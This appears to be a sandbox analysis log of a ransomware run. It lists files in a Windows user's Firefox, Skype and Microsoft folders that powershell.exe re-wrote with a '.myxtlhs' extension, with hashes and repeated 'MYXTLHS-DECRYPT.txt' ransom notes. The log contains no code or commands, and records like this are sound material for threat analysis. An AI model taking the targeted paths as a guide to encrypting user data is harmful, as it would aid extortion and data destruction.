SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\content-prefs.sqlite.myxtlhs
binary
MD5: ba12fe1ec475292e5922a67b12933293
SHA256: 22b2d92ffdf14109ef3c67ef4d9b839d0f4f905245e43b49cda820f404e269c8
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cookies.sqlite.myxtlhs
binary
MD5: 4dd07e10052504eda3eb1759cb2027eb
SHA256: 3733930c1652a64be8ff9c7cda5d25beecfe20664948560a64ff449ca9767432
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\containers.json.myxtlhs
binary
MD5: ce19595cc41beaf46d3dc5ed5bfbe873
SHA256: 548fdbaae34dbf2b829a1b501b4c3ba796f26c1aafeb6f77535690df6d9d1f75
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cookies.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\content-prefs.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\containers.json
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\bookmarkbackups\bookmarks-2018-08-28_14_uZyx1cMFmZ7ZpL4NneCk2A==.jsonlz4.myxtlhs
binary
MD5: 974b9eacfb819ad1ef8255e54fc57ae1
SHA256: 2fcba02a6826dafb70116aa677ffcaee1a139e8b73c0e87f83ce632d74990b0b
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cert9.db.myxtlhs
binary
MD5: 46c6025d8d4ab894dd2c0566f6ae69f6
SHA256: 7c615d3e2f4f29e0fab5be680568f79e4ad40877c653d179b1abee6387fbbef2
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\compatibility.ini.myxtlhs
binary
MD5: 151769d1b23ada0c6976032bc9200b10
SHA256: 1019fddffe4ca2dd0f83bbb5f6f011b95b7590c2e39aec3d34d1ea3cc1f07fd3
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\compatibility.ini
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cert9.db
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\bookmarkbackups\bookmarks-2018-08-28_14_uZyx1cMFmZ7ZpL4NneCk2A==.jsonlz4
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\bookmarkbackups\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklists\plugins.json.myxtlhs
binary
MD5: 88d32816521b66e0f2840ed16fc35afb
SHA256: 5ec5c96b62d8967f2eaa6bd07e42f9618a1a784920c9addfd620f4895748d49e
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklists\addons.json.myxtlhs
binary
MD5: ca12de931811824e056f59530c4b755d
SHA256: b3e6f5176cf05ad0333f1f14bfec9c10232216400f8ab57d6658870f3bfe9f75
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklists\addons.json
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklists\plugins.json
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklists\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklist.xml.myxtlhs
binary
MD5: acf478769c6c0eaa8fd553302dd2304c
SHA256: e2d0ba9d3c0e07340563d364c9d544cf8abb6682f47953d123b0f1955d036df2
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklist.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Pending Pings\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\addons.json.myxtlhs
binary
MD5: ae8eefd126b54f18c370afde2b9476f7
SHA256: 54b8ee5a66e6284b0dc3dbd83f490b0fb24705bb15bf913ec866a86227abd174
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\addonStartup.json.lz4.myxtlhs
binary
MD5: 63b323d4fabbb2fc365097ca2d11c6d6
SHA256: 9954c02b4df127db6abc2397a74d61fb6f225a6da6c0c00887eaaf69adf596cb
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20180807170231.myxtlhs
binary
MD5: 80168c40d60463f8a406284c208a0e5d
SHA256: 792e4438152bde52759b5865bd76ff593067163edacd8c94891582d5cfcd9dc1
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\addonStartup.json.lz4
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\addons.json
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Vault\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC.myxtlhs
binary
MD5: fdbed6a44c40feae2545417f4862cacb
SHA256: 1784e2b98c7e87efceff974731b4089f5c6b8a1ea35f288a1981f0760a66eaa3
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Extensions\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Word\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Word\STARTUP\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20180807170231
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\NormalEmail.dotm.myxtlhs
binary
MD5: 3777ddab6eaa65621de98ee77bc3b41c
SHA256: f4b0b6a7e03dd080c302c115dc9ef585e8be9bc651b211c2f865985c9a670842
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\Normal.dotm.myxtlhs
binary
MD5: a85fd55ec9afcd64cade595b8f0011e1
SHA256: 86f4b837500aa23791475e002a7f1cdb2f245e752d58c17daa5c4c935604e695
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\UProof\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\NormalEmail.dotm
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\ECCD4BA46722CB4F92060701865DDF09D8AF68B4.myxtlhs
ini
MD5: 5f3bda944a80a4d554685f4f11f50d32
SHA256: 39d4950c82d3b91c4bc42d824e143aa90d10f7ddc5f4837169521adf520c7924
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\LiveContent\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\E02357FC7708441D4B0BE5F371F4B28961870F70.myxtlhs
binary
MD5: de9ed0ce78c359dd6b0bfa34007745c7
SHA256: 3679ab53b34e82998ba7fae2c7209fb3a5d2f77877584ca6972bd7f4c8ea1948
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Access Parts\1033\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Access Parts\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\ECCD4BA46722CB4F92060701865DDF09D8AF68B4
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Stationery\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\slimcore-0-4223384469.blog.myxtlhs
binary
MD5: 9a7732114fc1445b8b128dc5ec1a69f5
SHA256: 25a6899938f3fce526051fcf4fed51c44456efa6cf273468cbb9e725b38a7341
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\shared.xml.myxtlhs
binary
MD5: b4580d869c2455e97fe1a8c7f366f24f
SHA256: a767b6412a4bc81effded208aa956f746365293101d240e498563459bc81675c
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Speech\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\E02357FC7708441D4B0BE5F371F4B28961870F70
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\shared.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\slimcore-0-4223384469.blog
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\main.db-journal.myxtlhs
binary
MD5: a4347bdf14c17bd5d5df581e2589c493
SHA256: b42efb3338c4fec8d1ea21a6197c9511c155999deccadf250fd507399b3d00fb
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\main.db.myxtlhs
binary
MD5: 7a65aa38f58da0129a417a030dce7266
SHA256: da719af1429158d56b07b0c4b3057470a55ab999785a7e772908878be112b4f8
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\main.db
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\main.db-journal
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data-wal.myxtlhs
binary
MD5: a1938b15a21b7bae6cef94c9f43655eb
SHA256: 86f66c695c23294180e65f279c8c9fa6306594318b49e9eaba87945ec590a52a
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\config.xml.myxtlhs
binary
MD5: 7149ae8b3c597d22f0e043334ff827e9
SHA256: 24ebbedd35705c6f86d135da15d4bb5ab0a389547c2ebe63207f5b05fda3b4ac
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\config.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data-wal
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data-shm.myxtlhs
binary
MD5: 3da60b7c9138f2b4ffbb09b148132397
SHA256: dc686558165ae8a2e9e798f14b87851684947f0a8b55df645875165984d6939c
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data-shm
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data.myxtlhs
binary
MD5: d3b90e8c3077749dbb04989266a2cb56
SHA256: bcb305be3078451a11695f70c10269932892f388f50c2c600da37c19e52f339e
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\settings.json.myxtlhs
binary
MD5: 87ec214d2faca7cee9fd8f429ef54e07
SHA256: b707591be06fdd78bd27b2b01893c14f46a642b46b956275960fa3dfdd8f2e65
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\settings.json
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\QuotaManager.myxtlhs
vc
MD5: 9c6b4c42069efc2c8999f0ae4a0e3797
SHA256: 7b4d27c9c1827a13a99c806034e30912f80f1bd9538142153c81cae9b25b8692
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype_MediaStackETW-2018.34.1.3-UVA-x86release-U.etl.bak.myxtlhs
binary
MD5: aa25a47cc2e24a2d078666450403c5f6
SHA256: bf35406fe203394bca5e3e5997f6115e0d284adcca03d19a763666a0b305e845
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Preferences.myxtlhs
binary
MD5: 60b42d23e70970f454ae5e2e11efe2e4
SHA256: 64e4e2566b2e99f62287b242405e0f2f4735a51297625ac7e4a5aa9d244a1562
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Preferences
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype_MediaStackETW-2018.34.1.3-UVA-x86release-U.etl.bak
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\QuotaManager
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype_MediaStackETW-2018.34.1.3-UVA-x86release-U.etl.myxtlhs
binary
MD5: d4a4e43ea1b6bd1a46bd3fbc525ea291
SHA256: f98470b3971fde0ed7cbad4014c27363ad1e2df663f83aa750de5a037ca68bb7
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype_MediaStackETW-2018.34.1.3-UVA-x86release-U.etl
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype.msrtc-1-1870167131.blog.myxtlhs
binary
MD5: faa33b81006e2e607e936aa28a091cf4
SHA256: 2b0dbe4b2aefd4094b2b2e4b05b39f4e09a046675d3109fc0658bde770e7ede2
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype.msrtc-1-1870167131.blog
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype.msrtc-0-2576771366.blog.myxtlhs
binary
MD5: 1f82023837eb0660465a3146343f09b5
SHA256: 4be7f51d805ff9b1a4d4bf2ac7d6ea37af8072c767a467c486f9ef1ef5efbf69
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\MANIFEST-000001.myxtlhs
binary
MD5: 97514751e625f856faf55cb53e6980ef
SHA256: 7e34f555de06eaa36ccb1bf79e5e07b454cc2c6694ee8ed132b86c0e1760f036
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\logs\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype.msrtc-0-2576771366.blog
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\MANIFEST-000001
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\LOG.old.myxtlhs
binary
MD5: d151c6caa0458ef5bd1d09164dc2a24e
SHA256: b5c292a87867410a5577c919583a2294686452a8af960a8e1578e00fd061369d
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\LOG.old
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\LOG.myxtlhs
binary
MD5: 139c0ca7009a477f4d7d35356d749774
SHA256: bf0394ab855afbd6695cd3eabd9b17f2fab69ed9059d348376f1d05ff56d4659
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\CURRENT.myxtlhs
binary
MD5: b820bb075cef345302d6f15292a057e1
SHA256: a6102b813e00ea76f5b2f4d840db457c1b8ddf391f185f5b9cd352cb38cfbd08
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\LOG
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\CURRENT
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000017.log.myxtlhs
binary
MD5: 3791270ec7f10cb58b6f0ad33f9b11da
SHA256: da730a6ac9488900b09221c1c5aeeb524ddec843307c9b12ddfa1aabcbfb979c
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000018.ldb.myxtlhs
binary
MD5: 1ea178d46671a87488ba1243e2b8f123
SHA256: b61f7f7497c3620f5e67a5a091551c136afc3b1401998833b560b1fc265df3ce
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000018.ldb
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000017.log
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000005.ldb.myxtlhs
binary
MD5: b2f7ee2a248cc821c9ff8d8c689e8d20
SHA256: acb474336c57d07b00a4264b52812379c0c0d51f181fd79b56b36aab20a3c439
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000005.ldb
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\MANIFEST-000001.myxtlhs
binary
MD5: ac484f5277ef422f642269b9fd3098bb
SHA256: aad77a76bd25c2f3c5e05a0a4acfdff8a2120a56ecb89eb8954bd53dae4cb18a
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\LOG.myxtlhs
binary
MD5: aa61703636f46e834581f627d8892343
SHA256: 44d9bf707729f391cb5319b81818b1690dcd73a9bb6bc60fbd9de53d29a4ecd2
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\LOG.old.myxtlhs
binary
MD5: 10a4fc593c95b97ff73f3f6659c67228
SHA256: e330a10472f38a4b4a8153e38905fd8dd6eff691542f915e63fe5aecdfefd7ff
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\MANIFEST-000001
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\LOG.old
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\LOG
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\000003.log.myxtlhs
binary
MD5: 8288b88dad91bd59af0d9fe436e900a5
SHA256: 3437c169a77aa58f284f429d529787e72bea1249f29a90fd31ebc13c6e60b561
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\CURRENT.myxtlhs
binary
MD5: 2139ac23adc98a3bc94f1203eac57365
SHA256: 6128a8e7c3ed14d66babf221e5e90335946991e54ca8409ddfe9e822a6a18008
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\CURRENT
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\000003.log
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
